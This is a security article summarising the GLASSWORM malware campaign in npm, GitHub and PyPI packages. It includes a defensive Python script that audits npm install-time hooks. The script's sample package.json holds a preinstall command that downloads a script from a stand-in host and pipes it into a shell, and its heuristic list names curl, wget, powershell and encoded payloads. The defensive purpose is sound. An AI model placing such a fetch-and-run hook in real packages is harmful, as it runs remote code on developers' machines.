GLASSWORM hides inside developer tools and, once inside, steals data, installs remote access malware, and even pushes a fake browser extension to monitor activity. According to Malwarebytes, the operation usually starts with developers: infections spread through compromised packages on code repositories such as npm, GitHub and PyPI, or through altered versions of packages published from trusted accounts.
After installation, a preinstall script fingerprints the machine and, if the locale is Russian, execution stops; otherwise it quietly waits and contacts the Solana blockchain to fetch stage two. Stage two is an infostealer targeting browser extension profiles, wallet apps, and various credential stores, and it exfiltrates the collected data to a remote server.
Stage three fetches a Ledger/Trezor phishing binary and a Node[.]js Remote Access Trojan, which gains persistence via scheduled tasks and Run keys so that it survives a reboot. The campaign also includes a force-installed Chrome extension, masquerading as “Google Docs Offline”, designed to surveil sessions and harvest cookies, keystrokes, and other sensitive data.
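The infection chain above begins with an npm `preinstall` lifecycle script, which npm executes automatically during `npm install`. The following is an added defensive example written for this page; it is not code from Malwarebytes or from the reported campaign. It parses `package.json` files, lists every install-time hook (`preinstall`, `install`, `postinstall`, `prepare`), and flags commands that match a few crude heuristics (inline `node -e`, downloaders, shell spawns, encoded payloads). The sample `package.json`, the `example-utils` name, the `example.invalid` URL and the heuristic patterns are all constructed for the demonstration.

```python
"""Audit npm packages for install-time lifecycle scripts.

Malicious packages often run their first stage from a package.json lifecycle
hook that npm executes on its own during installation. Listing those hooks,
and the commands they run, lets a reviewer inspect them before allowing an
install to proceed.
"""
import json
import os
import re
from typing import Dict, List, Tuple

# Lifecycle hooks that npm runs automatically around installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns constructed for this example; a match means "look
# closer", not "malicious".
SUSPICIOUS_PATTERNS = (
    re.compile(r"\bnode\s+-e\b"),                 # inline JavaScript
    re.compile(r"\bcurl\b|\bwget\b"),              # download during install
    re.compile(r"\bpowershell\b|\bcmd\s*/c\b"),    # shell spawn on Windows
    re.compile(r"base64|atob\("),                  # encoded payload
)


def find_install_hooks(package_json_text: str) -> List[Tuple[str, str]]:
    """Return (hook, command) pairs for every install-time script declared."""
    data = json.loads(package_json_text)
    scripts = data.get("scripts") or {}
    return [(hook, scripts[hook]) for hook in INSTALL_HOOKS if hook in scripts]


def classify_hook(command: str) -> List[str]:
    """Return the patterns (as strings) that match the hook command."""
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(command)]


def audit_tree(root: str) -> Dict[str, List[Tuple[str, str, List[str]]]]:
    """Walk a node_modules tree and collect install hooks per package dir.

    Returns {relative_package_dir: [(hook, command, matched_patterns), ...]}
    for every package that declares at least one install-time hook.
    """
    findings: Dict[str, List[Tuple[str, str, List[str]]]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                hooks = find_install_hooks(fh.read())
        except (OSError, ValueError):
            # Unreadable or malformed manifest: skip rather than abort the scan.
            continue
        if hooks:
            findings[os.path.relpath(dirpath, root)] = [
                (hook, cmd, classify_hook(cmd)) for hook, cmd in hooks
            ]
    return findings


# Constructed sample manifest (not a real package) with a hook that downloads
# and pipes a remote script into a shell at install time.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-utils",
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "preinstall": "node -e \"require('child_process')"
                      ".exec('curl https://example.invalid/stage2 | sh')\"",
    },
})

if __name__ == "__main__":
    for hook, cmd in find_install_hooks(SAMPLE_PACKAGE_JSON):
        print(f"{hook}: {cmd}\n  flags: {classify_hook(cmd)}")
    # To scan a real project tree: audit_tree("./node_modules")
```

The audit is a review aid, not a blocker: the heuristics are deliberately coarse and a legitimate native-addon package can have a `postinstall` too. The stronger control is to keep lifecycle scripts from running at all during dependency installation (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) and to run only the hooks that review has approved.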